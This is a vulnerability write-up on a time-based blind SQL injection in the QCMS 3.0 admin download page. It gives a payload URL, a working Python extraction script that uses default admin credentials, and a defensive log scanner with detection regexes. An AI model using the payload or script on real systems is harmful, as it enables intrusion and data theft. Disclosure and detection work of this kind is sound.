QCMS 3.0 SQL Injection Vulnerability
====================================

1. Vulnerability Overview
-------------------------

2. Affected Versions
--------------------

QCMS 3.0

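3. Reproduction Steps
---------------------

The injection point is in the download management page of the admin backend.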

![](/static/qingy/QCMS_3.0_sql注入漏洞/img/rId24.png)

Construct the payload:

```
http://www.0-sec.org/backend/down.html?title=1';select if(ascii(substr((select database()), 1, 1))-113, 1, sleep(5));%23
```

A simple script is attached here:

```python
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# author: Forthrglory
import requests


def getCookie():
    # Log in to the admin backend and return the response cookies as a dict
    url = 'http://127.0.0.1/admin.php'
    data = {
        'username': 'admin',
        'password': 'admin'
    }

    session = requests.session()
    res = session.post(url, data)

    return requests.utils.dict_from_cookiejar(res.cookies)


def getDatabase(url, arr, cookies):
    # Recover the database name one character at a time: the response is
    # delayed by sleep(5) only when the guessed character code matches
    name = ''

    for i in range(1, 11):
        for j in arr:
            data = url + '?title=1\';select if(ascii(substr((select database()), %s, 1))-%s, 1, sleep(5));%%23' % (i, ord(j))
            # print(data)
            res = requests.get(url=data, cookies=cookies)
            # print(res.elapsed.total_seconds())
            if res.elapsed.total_seconds() > 5:
                name += j
                print(name)
                break
    print('database=' + name)


if __name__ == '__main__':
    url = 'http://127.0.0.1/backend/down.html'
    arr = []

    # Candidate characters: ASCII 48 ('0') through 122 ('z')
    for i in range(48, 123):
        arr.append(chr(i))

    cookies = getCookie()
    print(cookies)
    getDatabase(url, arr, cookies)
```
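
For defenders, the following added example (not part of the original write-up or of QCMS) scans web access logs for requests to the endpoint above whose `title` parameter shows the payload's traits: a stacked query after a quote, a time-delay call, and character-by-character extraction. The rule patterns, function names and log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Endpoint and parameter taken from the write-up above.
TARGET_PATH = "/backend/down.html"
TARGET_PARAM = "title"

# Heuristic rules (assumptions of this example), applied to the decoded value.
RULES = {
    "stacked_query": re.compile(r"['\"]\s*;\s*(select|insert|update|delete|drop)\b", re.I),
    "time_delay": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "char_extraction": re.compile(r"\b(ascii|ord)\s*\(\s*(substr|substring|mid)\s*\(", re.I),
}
# Combined-log-format prefix: client IP, then the URL inside the quoted request line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*"')

# Constructed sample log lines, not captured from a real system.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /backend/down.html?title=report HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /backend/down.html?title=sleep+study+guide HTTP/1.1" 200 498
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /backend/down.html?title=1';select%20if(ascii(substr((select%20database()),%201,%201))-113,%201,%20sleep(5));%23 HTTP/1.1" 200 512
"""


def param_values(url, name):
    """Yield decoded values of `name`; split on '&' only, since the payload contains ';'."""
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == name:
            yield unquote_plus(value)


def scan(log_text):
    """Return [(client_ip, [rule names])] for suspicious requests to the target endpoint."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or urlsplit(m.group(2)).path != TARGET_PATH:
            continue
        for value in param_values(m.group(2), TARGET_PARAM):
            hits = sorted(name for name, rx in RULES.items() if rx.search(value))
            if hits:
                findings.append((m.group(1), hits))
    return findings


if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG):
        print(ip, ",".join(hits))
```

The second sample line shows that the word `sleep` alone does not trigger the time-delay rule; only a function-call form does.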

References
----------

> https://xz.aliyun.com/t/7269
